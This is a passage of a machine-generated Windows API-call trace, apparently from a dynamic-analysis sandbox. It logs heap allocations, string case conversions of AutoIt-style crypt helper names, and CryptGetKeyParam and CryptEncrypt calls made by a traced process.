0x43cfd88 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0710 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0105.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0105.373] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0105.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0710 | out: hHeap=0x1780000) returned 1 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02d8 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0105.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0105.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02d8 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0105.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0105.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0105.377] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d05a8 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0328 | out: hHeap=0x1780000) returned 1 [0105.377] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2bd0, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2bd0*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0105.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.379] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.379] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0105.379] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac800 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0105.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0105.380] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb000, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.416] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0xd0cb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0xd0d0) returned 1 [0105.416] CharLowerBuffW (in: lpsz="byte[53457]", cchLength=0xb | out: lpsz="byte[53457]") returned 0xb [0105.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, 